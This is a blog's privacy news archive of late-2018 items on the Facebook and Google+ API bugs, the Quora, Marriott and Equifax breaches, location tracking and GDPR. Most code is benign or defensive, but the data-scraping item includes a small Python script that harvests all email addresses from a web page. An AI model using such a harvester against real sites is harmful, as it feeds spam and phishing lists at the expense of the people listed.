Category Archives: Privacy

Porn Sites Collect More User Data Than Netflix Or Hulu

An anonymous reader quotes a report from Quartz: The biggest and perhaps best source of data about what people like to watch on the internet and what they would pay for doesn't come from streaming giants like Netflix, Amazon Prime Video, or Hulu. It comes from porn. While consuming porn is typically a private and personal affair, porn sites still track your every move: What content you choose, which moments you pause, which parts you repeat. By mining this data to a deeper degree than other streaming services, many porn sites are able to give internet users exactly what they want -- and they want a lot of it. [...] MindGeek is the world's biggest porn company -- more specifically, it's a holding company that owns numerous adult entertainment sites and production companies, including the Pornhub Network. Like other streaming giants, MindGeek's sites analyze user data, but the company has an edge when it comes to producing tailor-made content in-house. With at least 125 million daily visits, MindGeek has a massive range of users to draw data from and create content for. The average user can watch as much porn as they'd like without so much as making an account, let alone paying, but in exchange for meeting desires that can't always be met elsewhere, companies like MindGeek access user data because the user more willingly lets them. And it eventually pays off, when users decide to pay for premium content and the habits of paying subscribers become even clearer. What's more, Pornhub, in particular, operates one of the most sophisticated digital data analysis operations that caters primarily to users and not advertisers. Pornhub Insights provides transparency into its data collection -- on the most intimate of subjects -- by making research and analysis from billions of data points about viewership patterns, often tied to events from politics to pop culture, available to the public. It offers more than many other tech giants do.


Facebook bug exposed private photos of 6.8M users to third-party developers

By Waqas

Another day, another privacy breach – This time, the social media giant Facebook has announced that a bug in its Photo API exposed private photos of over 6.8 million users to third-party app developers. The breach took place from September 13 to September 25, 2018, which means for 12 days straight some developers could view your […]


A bug in Facebook Photo API exposed photos of 6.8 Million users

New problems for Facebook: the social network giant announced that a bug related to its Photo API could have allowed third-party apps to access users’ photos.

Facebook announced that photos of 6.8 million users might have been exposed by a bug in the Photo API that allowed third-party apps to access them.
The bug impacted apps from over 870 developers; only apps the user had granted access to their photos could have exploited it.
According to Facebook, the flaw exposed user photos for 12 days, between September 13 and September 25, 2018.

The flaw was discovered by Facebook’s internal team and impacted users who had used Facebook Login and allowed third-party apps to access their photos.

“Our internal team discovered a photo API bug that may have affected people who used Facebook Login and granted permission to third-party apps to access their photos. We have fixed the issue but, because of this bug, some third-party apps may have had access to a broader set of photos than usual for 12 days between September 13 to September 25, 2018.” reads a post published by Facebook.

In theory, applications that are granted access to photos can access only images shared on a user’s timeline. The bug could also have exposed other photos, including ones shared on Facebook Marketplace or via Stories, and even photos that were uploaded but never posted.
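
To make the scope issue concrete, here is a rough sketch of how a third-party app normally reads a user’s photos once the user_photos permission has been granted via Facebook Login. The token value is hypothetical and the Graph API version is illustrative only:

    import json
    import urllib.parse
    import urllib.request

    ACCESS_TOKEN = "EAAB..."  # hypothetical user token carrying the user_photos permission

    def list_photos(token):
        # Ask the Graph API for the photos this token is scoped to see.
        query = urllib.parse.urlencode({
            "fields": "id,name,created_time",
            "access_token": token,
        })
        url = "https://graph.facebook.com/v3.2/me/photos?" + query
        with urllib.request.urlopen(url, timeout=10) as resp:
            return json.load(resp)["data"]

    # Normally this returns timeline photos only; during the 12-day window the
    # same call could also surface Marketplace and Stories photos, plus uploads
    # that were never posted.
    for photo in list_photos(ACCESS_TOKEN):
        print(photo["id"], photo.get("created_time"))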

“Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.” continues the post.

Facebook is notifying impacted people via an alert in their account.

“We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.” concludes Facebook.

“We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug.”

Pierluigi Paganini



Personal & banking data of 120 million Brazilians leaked online

By Carolina

The Cadastro de Pessoas Físicas (CPF) is a taxpayer registry identification for Brazilians – in this case, 120 million CPFs were exposed online. The IT security researchers at InfoArmor’s Advanced Threat Intelligence team discovered a treasure trove of personal sensitive data belonging to over 120 million Brazilians exposed on an unprotected AWS (Amazon Web Service) S3 cloud […]


A Corporate-issued Laptop Stolen From a Lenovo Employee in September Contained Unencrypted Payroll Data on APAC Staff

A corporate-issued laptop lifted from a Lenovo employee in Singapore contained a cornucopia of unencrypted payroll data on staff based in the Asia Pacific region, news outlet The Register reports. From the report: Details of the massive screw-up reached us from Lenovo staffers, who are simply bewildered at the monumental mistake. Lenovo has sent letters of shame to its employees confessing the security snafu. "We are writing to notify you that Lenovo has learned that one of our Singapore employees recently had the work laptop stolen on 10 September 2018," the letter from Lenovo HR and IT Security, dated 21 November, stated. "Unfortunately, this laptop contained payroll information, including employee name, monthly salary amounts and bank account numbers for Asia Pacific employees and was not encrypted." Lenovo employs more than 54,000 staff worldwide, the bulk of whom are in China.


Smashing Security #108: Hoaxes, Huawei and chatbots – with Mikko Hyppönen


The curious case of George Duke-Cohan, Huawei’s CFO finds herself in hot water, and the crazy world of mobile phone mental health apps.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guests Mikko Hyppönen from F-Secure and technology journalist Geoff White.

Rhode Island Sues Alphabet Over Google+ Security Incidents

A government organization in Rhode Island announced on Wednesday that it has filed a lawsuit against Google’s parent company, Alphabet Inc., over the recent security incidents involving the Google+ social network.


A critical bug in Microsoft accounts left 400M users exposed

By Waqas

A bug bounty hunter from India, Sahad Nk, who works for SafetyDetective, a cybersecurity firm, has received a reward from Microsoft for uncovering and reporting a series of critical vulnerabilities in Microsoft accounts. These vulnerabilities put users’ Microsoft accounts at risk, from MS Office files to Outlook emails. This means all kinds of accounts (over 400 […]


Border Agents Fail To Delete Personal Data of Travelers After Electronic Searches, Watchdog Says

The Department of Homeland Security's internal watchdog, known as the Office of the Inspector General (OIG), found that the majority of U.S. Customs and Border Protection (CBP) agents fail to delete the personal data they collect from travelers' devices. Last year alone, border agents searched through the electronic devices of more than 29,000 travelers coming into the country. "CBP officers sometimes upload personal data from those devices to Homeland Security servers by first transferring that data onto USB drives -- drives that are supposed to be deleted after every use," Gizmodo reports. From the report: Customs officials can conduct two kinds of electronic device searches at the border for anyone entering the country. The first is called a "basic" or "manual" search and involves the officer visually going through your phone, your computer or your tablet without transferring any data. The second is called an "advanced search" and allows the officer to transfer data from your device to DHS servers for inspection by running that data through its own software. Both searches are legal and don't require a warrant or even probable cause -- at least they don't according to DHS. It's that second kind of search, the "advanced" kind, where CBP has really been messing up and regularly leaving the personal data of travelers on USB drives. According to the new report [PDF]: "[The Office of the Inspector General] physically inspected thumb drives at five ports of entry. At three of the five ports, we found thumb drives that contained information copied from past advanced searches, meaning the information had not been deleted after the searches were completed. Based on our physical inspection, as well as the lack of a written policy, it appears [Office of Field Operations] has not universally implemented the requirement to delete copied information, increasing the risk of unauthorized disclosure of travelers' data should thumb drives be lost or stolen." The report also found that Customs officers "regularly failed to disconnect devices from the internet, potentially tainting any findings stored locally on the device." It also found that the officers had "inadequate supervision" to make sure they were following the rules. There are also a number of concerning redactions. For example, everything from what happens during an advanced search after someone crosses the border to the reason officials are allowed to conduct an advanced search at all has been redacted.


Apps on smartphones are selling and sharing our location data 24/7

By Waqas

It’s no surprise that the apps we download on our smartphones are tracking our movements and transferring the information to third parties without our consent. Last year Google was caught collecting location data from Android users even when the device’s location service was off; then came the gay dating app Grindr, Facebook, and the fitness app by […]


Data scraping treasure trove found in the wild

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites, either by manual means (which isn’t time optimal) or by automated processes such as dedicated programs or bots. Often, this data scraping is done for nefarious purposes, feeding marketing lists or enabling simply threatening behaviour. It also typically relies on the person being scraped having provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.
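
As a minimal illustration of the automated kind, the sketch below pulls every email address out of a hypothetical public page using nothing but Python’s standard library; real scrapers add DOM parsing, pagination, and bot networks on top of this:

    import re
    import urllib.request

    URL = "https://example.com/public-profiles"  # hypothetical target page

    def scrape_emails(url):
        # Fetch the raw HTML and grab anything shaped like an email address.
        with urllib.request.urlopen(url, timeout=10) as resp:
            html = resp.read().decode("utf-8", errors="replace")
        # Deliberately simple pattern; production scrapers parse the DOM instead.
        return sorted(set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)))

    for address in scrape_emails(URL):
        print(address)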

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public-facing LinkedIn profile. Indeed, many people have said they received breach notifications at their LinkedIn-specific mail address, and there’s some mention of GitHub too.

Elsewhere, some 22 million records were found on the second server. These related to job search aggregation data and included IP address, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump: name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red-hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready-made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, the same may not apply to whoever finds the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the LinkedIn profile information, it’s all about personal choice. Take a look at your LinkedIn right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead-in!

A common destination for business-centric grab bags such as this one is the unremarkable job search site. Be on the lookout for a flood of poor quality job offer spam. Be especially wary if it comes bearing gifts of paid membership; nobody should pay someone who grabbed their data free of charge and is now using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested by spammers, so readjust your quality filters if needed. The good news is that most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phone calls and peculiar emails will go a long way towards minimising any further potential harm.


Is 2019 Privacy Rights’ Breakout Year?

Whatever else it may bring, 2019 will be a breakout year for online privacy, as the EU’s GDPR takes root and legislation in other nations follows suit. But not everyone is on board with the new privacy regime. Who will be the privacy leaders and laggards in the New Year?


Google will shut down consumer version of Google+ earlier due to a bug

Google announced it will close the consumer version of Google+ earlier than originally planned due to the discovery of a new security flaw.

Google will close the consumer version of Google+ in April, four months earlier than planned. According to G Suite product management vice president David Thacker, the company will maintain only a version designed for businesses. Google will also shut down the application programming interfaces (APIs) used by developers to access Google+ data within 90 days, due to the discovery of a bug.

“We’ve recently determined that some users were impacted by a software update introduced in November that contained a bug affecting a Google+ API.” wrote David Thacker.

“We discovered this bug as part of our standard and ongoing testing procedures and fixed it within a week of it being introduced. No third party compromised our systems, and we have no evidence that the app developers that inadvertently had this access for six days were aware of it or misused it in any way.”

The new flaw was introduced with a software update in November and it was discovered during routine testing and quickly fixed by the experts of the company.

Thacker pointed out that the protection of Google users is a priority for the firm and for this reason all Google+ APIs will be shut-down soon.

“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs,” Thacker said.

“While we recognize there are implications for developers, we want to ensure the protection of our users.”


According to Google, the vulnerability affected approximately 52.5 million users, allowing applications to see profile information such as name, occupation, age, and email address even if access was set to private.

Google initially announced plans to shut down Google+ after discovering a bug that exposed private data in as many as 500,000 accounts.

At the time, there was no evidence that developers had taken advantage of the flaw.

Google is in the process of notifying any enterprise customers that were impacted by this flaw.

“A list of impacted users in those domains is being sent to system administrators, and we will reach out again if any additional impacted users or issues are discovered.” concludes Thacker. 

Pierluigi Paganini



Data protection impact assessments for health research: what’s changed under GDPR?

Since GDPR came into effect on 25 May this year, the health regulations have been updated to incorporate more stringent requirements around protecting personal information during healthcare research. The newly updated Health Research Regulations 2018 have raised the bar for carrying out a data protection impact assessment (DPIA). This post is the first in a series I’ll be writing about GDPR, privacy and health data.

We all know privacy by design is a cornerstone of the General Data Protection Regulation. The first building block of that foundation is carrying out a DPIA (commonly referred to as a privacy impact assessment). In November, the Data Protection Commissioner published guidance for data controllers and processors whose business activities may require them to carry out a DPIA. It is available as a free PDF here.

More specifically for the health sector, the Health Research Regulations 2018 make it mandatory to perform a DPIA in all cases that involve processing personal data for research purposes. The aim is to minimise risk to the data subject – and that is a good thing.

The revised rules apply to a wide variety of stakeholders, including research bodies, pharmaceutical companies, academic institutions, higher education institutes, and other research-related bodies such as those attached to hospitals. Equally, technology companies may carry out research involving health information and they too need to comply with this requirement.

The Health Research Board has published guidance for researchers to reflect the new data protection landscape. Broadly speaking, they compel researchers to take suitable and specific measures to safeguard the fundamental rights and freedoms of data subjects.

This essentially breaks down into two key questions researchers need to ask ahead of any impact assessment exercise:

Is there a risk to the rights and freedoms of the data subject?

Consider this keeping in mind the data subject rights under GDPR, which include the rights of access, rectification, objection, and portability. The Data Protection Commissioner has published a free report which describes these rights.

Have you mitigated those risks?

Do you have policies in place, and are they published online in a transparent way? Have you done a data mapping or data inventory exercise? Do you have an appropriate legal basis for processing information? Are you archiving information in line with retention schedules? Do you have a process in place for a subject access request?

By definition, a DPIA involves assessing the impact of risks to the data subject, and to their rights and freedoms. The nature of research means you don’t know beforehand what the outcome will be. You may discover during the exploration process that there is the potential to use the same information for a different purpose.

The Health Research Regulations 2018 will lead to many, many more DPIAs in the future. Research groups are likely to need external assistance to carry them out, and to get ready for this new level of compliance they should familiarise themselves with the DPIA process.

At BH Consulting, we have developed a privacy impact assessment template which guides our clients in identifying the risks associated with data processing. Get in touch to find out how we can help.

Tracy Elliott is a senior data protection consultant with BH Consulting. Check back over the coming weeks for more posts about data protection and health research.

 


House Panel Issues Scathing Report On ‘Entirely Preventable’ Equifax Data Breach

An anonymous reader quotes a report from The Hill: The Equifax data breach, one of the largest in U.S. history, was "entirely preventable," according to a new House committee investigation. The House Oversight and Government Reform Committee, following a 14-month probe, released a scathing report Monday saying the consumer credit reporting agency aggressively collected data on millions of consumers and businesses while failing to take key steps to secure such information. "In 2005, former Equifax Chief Executive Officer (CEO) Richard Smith embarked on an aggressive growth strategy, leading to the acquisition of multiple companies, information technology (IT) systems, and data," according to the 96-page report authored by Republicans. "Equifax, however, failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history. Such a breach was entirely preventable." The report blames the breach on a series of failures on the part of the company, including a culture of complacency, the lack of a clear IT management operations structure, outdated technology systems and a lack of preparedness to support affected consumers. "A culture of cybersecurity complacency at Equifax led to the successful exfiltration of the personal information of approximately 148 million individuals," the committee staff wrote. "Equifax's failure to patch a known critical vulnerability left its systems at risk for 145 days. The company's failure to implement basic security protocols, including file integrity monitoring and network segmentation, allowed the attackers to access and remove large amounts of data." The Oversight staff found that the company not only lacked a clear management structure within its IT operations, which hindered it from addressing security matters in a timely manner, but it also was unprepared to identify and notify consumers affected by the breach. The report said the company could have detected the activity but did not have "file integrity monitoring enabled" on this system, known as ACIS, at the time of the attack.


Google Plus hit by another breach – Data of 52.5M users exposed

By Waqas

Google Plus has been hit by yet another bug forcing the company to shut down the social media site earlier than previously anticipated. In October this year, Google revealed that a bug was present in the API for the consumer version of Google Plus (Google+) that allowed third-party developers to access data of not just over 500,000 users but also […]


SecurityWeek RSS Feed: Tor Project Releases Financial Documents

The Tor Project, the organization behind the Tor anonymity network, has published financial documents for the past two years, and while they show that its revenue has increased significantly, it’s still small compared to the budgets of potential adversaries.


Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret

Dozens of companies use smartphone locations to help advertisers and even hedge funds. They say it's anonymous, but the data shows how personal it is. From a report: The millions of dots on the map trace highways, side streets and bike trails -- each one following the path of an anonymous cellphone user. One path tracks someone from a home outside Newark to a nearby Planned Parenthood, remaining there for more than an hour. Another represents a person who travels with the mayor of New York during the day and returns to Long Island at night. [...] An app on the device gathered her location information, which was then sold without her knowledge. It recorded her whereabouts as often as every two seconds, according to a database of more than a million phones in the New York area that was reviewed by The New York Times. At least 75 companies receive anonymous, precise location data from apps whose users enable location services to get local news and weather or other information, The Times found. Several of those businesses claim to track up to 200 million mobile devices in the United States -- about half those in use last year. The database reviewed by The Times -- a sample of information gathered in 2017 and held by one company -- reveals people's travels in startling detail, accurate to within a few yards and in some cases updated more than 14,000 times a day.


Consumers still put trust in big brands despite breaches

Janrain conducted a survey to better understand how consumers really feel about brands in the wake of so many breaches. The company polled 1,000 UK adults and found that most consumers are still willing to part with their personal information if it can somehow benefit them. While big internet companies like Google and Facebook remain among the least trusted businesses, a large number of respondents put the most faith in pharmaceutical and travel companies including …


Not all data collection is evil: Don’t let privacy scandals stall cybersecurity

Facebook continues to be criticized for its data collection practices. The media is hammering Google over how it handles data. JPMorgan Chase & Company was vilified for using Palantir software to allegedly invade the privacy of employees. This past June marked the five-year anniversary of The Guardian’s first story about NSA mass surveillance operations. These incidents and many others have led to an era where the world is more heavily focused on privacy and trust. …


DuckDuckGo study claims Google Incognito searches are not private

By Waqas

Google offers customized search results even in Incognito Mode, a study finds. DuckDuckGo claims that Google’s search results are personalized based on your location data and previous searches, not just when browsing normally but also when you are logged out or in incognito mode. It’s a fact that offering personalized and customized search results has been a hallmark of Google. […]


Facial Recognition Has To Be Regulated To Protect the Public, Says AI Report

A new report (PDF) from the AI Now Institute calls for the U.S. government to take general steps to improve the regulation of facial recognition technology amid much debate over the privacy implications. "The implementation of AI systems is expanding rapidly, without adequate governance, oversight, or accountability regimes," it says. The report suggests, for instance, extending the power of existing government bodies in order to regulate AI issues, including use of facial recognition: "Domains like health, education, criminal justice, and welfare all have their own histories, regulatory frameworks, and hazards." MIT Technology Review reports: It also calls for stronger consumer protections against misleading claims regarding AI; urges companies to waive trade-secret claims when the accountability of AI systems is at stake (when algorithms are being used to make critical decisions, for example); and asks that they govern themselves more responsibly when it comes to the use of AI. And the document suggests that the public should be warned when facial-recognition systems are being used to track them, and that they should have the right to reject the use of such technology. The report also warns about the use of emotion tracking in face-scanning and voice detection systems. Tracking emotion this way is relatively unproven, yet it is being used in potentially discriminatory ways -- for example, to track the attention of students. "It's time to regulate facial recognition and affect recognition," says Kate Crawford, cofounder of AI Now and one of the lead authors of the report. "Claiming to 'see' into people's interior states is neither scientific nor ethical."


NBlog Dec 7 – who owns the silos?


Michael Rasmussen has published an interesting, thought-provoking piece about the common ground linking specialist areas such as risk, security and compliance, breaking down the silos.

“Achieving operational resiliency requires a connected view of risk to see the big picture of how risk interconnects and impacts the organization and its processes. A key aspect of this is the close relationship between operational risk management (ORM) and business continuity management (BCM). It baffles me how these two functions operate independently in most organizations when they have so much synergy.”

While Michael’s perspective makes sense, connecting, integrating or simply seeking alignment between diverse specialist functions is, let's say, challenging. Nevertheless, I personally would much rather collaborate with colleagues across the organization to find and jointly achieve shared goals that benefit the business than perpetuate today's blinkered silos and turf wars. At the very least, I'd like to understand what drives and constrains, inspires and concerns the rest of the organization, outside my little silo.

Once you start looking, there are lots of overlaps, common ground, points of mutual interest and concern. Here are a few illustrative examples:
  • Information risk, information security, information technology: the link is glaringly obvious, and yet usually the second words are emphasized, leaving the first woefully neglected;
  • Risk and reward, challenge and opportunity: these are flip sides of the same coin that all parts of the business should appreciate. Management is all about both minimizing the former and maximizing the latter. Business is not a zero-sum game: it is meant to achieve objectives, typically profit and other forms of successful outcomes. And yes, that includes information security!
  • Business continuity involves achieving resilience for critical business functions, activities, systems, information flows, supplies, services etc., often by mitigating risks through suitable controls. The overlap between BCM, [information] risk management and [information] security is substantial, starting with the underlying issue of what 'critical' actually means to the organization;
  • Human Resources, Training, Health and Safety and Information Risk and Security are all concerned with people, as indeed is Management. People are tricky to direct and control. People have their own internal drivers and constraints, their biases and prejudices, aims and objectives. Taming the people without destroying the sparks of creativity and innovation that set us apart from the robots is a common challenge ... and, before long, taming those robots will be the next common challenge.

Dig deeper still and you'll also find points of mutual disinterest and conflicts within the organization. Marketing, for instance, yearns to gather and exploit all the information it can possibly obtain on prospective customers, causing sleepless nights for the Privacy Officer. Operations find it convenient or necessary to use shared accounts on shop-floor IT systems in the interest of speed, efficiency, safety etc. whereas Information Risk and Security point out that shared accounts are prohibited under corporate-wide security policies for accountability and control reasons.

You could view the organization as a multi-dimensional framework of interconnections and tensions between its constituent parts, all heading towards roughly the same goal/s (hopefully!) but on occasions pulling any which way at different speeds to get there. To make matters still more complex, the web of influence extends beyond the organization through its proximal contacts to The World At Large. That takes us into the realm of chaos theory, global politics and sociology. 'Nuff said.

All the organization's activities fall under the umbrella of corporate governance, senior managers clarifying the organization's grand objectives and optimizing the organization's overall performance by establishing and monitoring the corporate structures, hierarchies, strategies, policies and other directives, information flows, relationships, systems, management arrangements etc. necessary to achieve them. Driving alignment and reducing conflicts is part of the governance art. Silos are governance failures.

Measuring privacy operations: Use of technology on the rise

Critical privacy program activities such as creating data inventories, conducting data protection impact assessments (DPIA), and managing data subject access rights requests (DSAR) are now well established in large and small organizations in both Europe and the United States, according to TrustArc and the International Association of Privacy Professionals (IAPP). “Among our thousands of members, we know that privacy teams are now reporting on a regular basis to company leadership, and consequently they need to …


Consumers believe social media sites pose greatest risk to data

A majority of consumers are willing to walk away from businesses entirely if they suffer a data breach, with retailers most at risk, according to Gemalto. Two-thirds (66%) are unlikely to shop or do business with an organisation that experiences a breach where their financial and sensitive information is stolen. Retailers (62%), banks (59%), and social media sites (58%) are the most at risk of suffering consequences with consumers prepared to use their feet. Surveying …


Smashing Security #107: Sextorting the US army, and a Touch ID scam


Fitness apps exploit TouchID through a sneaky user interface trick, tech giants claim to have a plan to banish passwords, and you won’t believe who was behind a sextortion scam that targeted over 400 members of the US military.

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by ferret-loving ethical hacker Zoë Rose.

Researchers: GDPR Already Having Positive Effect on Cybersecurity in EU

The General Data Protection Regulation (GDPR) seems to already be having a positive effect on the state of cybersecurity in Europe less than seven months after it was enacted, showing that policy indeed can have a direct effect on organizations' security practices, security researchers said.


Breaches, breaches everywhere, it must be the season

After last week’s shocker from Marriott, this week started off with disclosures about breaches at Quora, Dunkin’ Donuts, and 1-800-Flowers.

Quora

Quora is an online community that focuses on asking and answering questions. It was founded in 2009 by two former Facebook employees.

The stolen data may concern up to 100 million users of the platform and includes usernames, email addresses, and encrypted passwords. In some cases, imported data from other social networks and private messages on the platform may have been taken as well.

To counter future abuse of the login credentials, we would advise Quora users to change their password and make sure that the combination of credentials they used on Quora isn’t used elsewhere. Even though Quora hashed and salted the passwords, it is not prudent to assume nobody will be able to crack them. For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.
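
For readers wondering what salting actually buys, here is a standard-library sketch of the general technique (not Quora’s actual scheme): each password is hashed together with a unique random salt, so identical passwords produce different stored values and precomputed lookup tables become useless. Note that salting does nothing to save a weak or re-used password from a targeted brute-force attempt, which is why changing it still matters:

    import hashlib
    import hmac
    import os

    ITERATIONS = 200_000  # deliberately slow, to hinder offline cracking

    def hash_password(password):
        # A site stores (salt, digest) per user -- never the plaintext.
        salt = os.urandom(16)  # unique random salt per user
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return salt, digest

    def verify_password(password, salt, digest):
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return hmac.compare_digest(candidate, digest)

    salt, digest = hash_password("correct horse battery staple")
    assert verify_password("correct horse battery staple", salt, digest)
    assert not verify_password("hunter2", salt, digest)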

For those who no longer want to be registered at Quora, we also advise you to check under Settings and Disconnect any and all Connected Accounts.

Quora’s official statement can be checked for further details and updates.

Dunkin’ Donuts

A threat actor successfully managed to gain access to Dunkin’ Donuts Perks accounts. DD Perks is a run-of-the-mill loyalty rewards program. Dunkin’ Donuts claims that there was no breach of its own systems and that re-used passwords were to blame.

we’ve been informed that third parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts.

As a countermeasure, they forced password resets for all the customers the company believes were affected. If you are one of these customers, the threat actors could have learned your first and last names, email address, 16-digit DD Perks account number, and DD Perks QR code.

I repeat myself: For those that are in the habit of re-using passwords across different sites, please read: Why you don’t need 27 different passwords.

1-800-Flowers

The Canadian online outpost of the floral and gourmet foods gift retailer reported an incident in which a threat actor may have gained access to customer data from 75,000 Canadian orders, including names and credit card information, over a four-year period. Even though the breach did not impact any customers of its U.S. website, 1-800-Flowers.com, the company has filed a notice with the attorney general’s office in California.

The stolen payment information seems to include credit card numbers and all the related information: names, expiration dates, and security codes. That’s really all any seasoned criminal needs to plunder your account.

If you fear you may be a victim of this breach, here’s what you can do to prevent further damage:

  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering

Or download our Data Breach Checklist here.


Is it the season?

Some of the recent breaches happened quite some time ago or have been ongoing for years, so why are we hearing about them all now?

Possible reasons:

  • New legislation requires companies to report breaches
  • Breaches happen all the time, but these happen to be some very serious or big ones, so the media talks about them
  • When a big breach is aired you will always see a few smaller ones, trying to hide in its shadow

If you’re a business looking for tips to prevent getting hit by a breach:

  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.


House GOP Campaign Arm Targeted by ‘Unknown Entity’ in 2018

Thousands of emails were stolen from aides to the National Republican Congressional Committee during the 2018 midterm campaign, a major breach exposing vulnerabilities that have kept cybersecurity experts on edge since the 2016 presidential race.


The Secret Service Wants To Test Facial Recognition Around the White House

The Secret Service is planning to test facial recognition surveillance around the White House, "with the goal of identifying 'subjects of interest' who might pose a threat to the president," reports The Verge. The document with the plans was published by the American Civil Liberties Union, describing "a test that would compare closed circuit video footage of public White House spaces against a database of images -- in this case, featuring employees who volunteered to be tracked." From the report: The test was scheduled to begin on November 19th and to end on August 30th, 2019. While it's running, film footage with a facial match will be saved, then confirmed by human evaluators and eventually deleted. The document acknowledges that running facial recognition technology on unaware visitors could be invasive, but it notes that the White House complex is already a "highly monitored area" and people can choose to avoid visiting. We don't know whether the test is actually in operation, however. "For operational security purposes we do not comment on the means and methods of how we conduct our protective operations," a spokesperson told The Verge. The ACLU says that the current test seems appropriately narrow, but that it "crosses an important line by opening the door to the mass, suspicionless scrutiny of Americans on public sidewalks" -- like the road outside the White House. (The program's technology is supposed to analyze faces up to 20 yards from the camera.) "Face recognition is one of the most dangerous biometrics from a privacy standpoint because it can so easily be expanded and abused -- including by being deployed on a mass scale without people's knowledge or permission."


Quora hacked: Personal data of 100 million users stolen

By Waqas

Quora hacked – Change your password now. Another day, another data breach – This time Quora, a question-and-answer website, has suffered a massive data breach in which personal data of 100 million registered users has been stolen, the company said on Tuesday, December 4th. In a blog post, Quora’s Chief Executive Adam D’Angelo explained that the […]


Marriott’s Breach Response Is So Bad, Security Experts Are Filling In the Gaps

An anonymous reader quotes a report from TechCrunch: Last Friday, Marriott sent out millions of emails warning of a massive data breach -- some 500 million guest reservations had been stolen from its Starwood database. One problem: the email sender's domain didn't look like it came from Marriott at all. Marriott sent its notification email from "email-marriott.com," which is registered to a third-party firm, CSC, on behalf of the hotel chain giant. But there was little else to suggest the email was at all legitimate -- the domain doesn't load or have an identifying HTTPS certificate. In fact, there's no easy way to check that the domain is real, except a buried note on Marriott's data breach notification site that confirms the domain as legitimate. But what makes matters worse is that the email is easily spoofable. Many others have sounded the alarm on Marriott's lackluster data breach response. Security expert Troy Hunt, who founded data breach notification site Have I Been Pwned, posted a long tweet thread on the hotel chain giant's use of the problematic domain. As it happens, the domain dates back at least to the start of this year when Marriott used the domain to ask its users to update their passwords. Others have also resorted to defending Marriott customers from cybercriminals. Nick Carr, who works at security giant FireEye, registered the similarly named "email-mariott.com" on the day of the Marriott breach. "Please watch where you click," he wrote on the site. "Hopefully this is one less site used to confuse victims." Had Marriott just sent the email from its own domain, it wouldn't be an issue.
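
For the technically inclined, one rough sanity check on a sender domain is whether it serves a valid TLS certificate and whom that certificate identifies. A standard-library Python sketch follows; the call simply raises an error for a domain with no working HTTPS endpoint (as was reported for email-marriott.com), and a valid certificate alone still doesn't prove who operates the site:

    import socket
    import ssl

    def peer_certificate(hostname, port=443):
        # Open a verified TLS connection and return the server certificate details.
        context = ssl.create_default_context()
        with socket.create_connection((hostname, port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=hostname) as tls:
                return tls.getpeercert()

    cert = peer_certificate("email-marriott.com")  # raises if no valid HTTPS
    print(cert.get("subject"))   # who the certificate was issued to
    print(cert.get("issuer"))    # which CA issued it
    print(cert.get("notAfter"))  # expiry date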


Private data of more than 82 million US citizens left exposed

By Uzair Amir

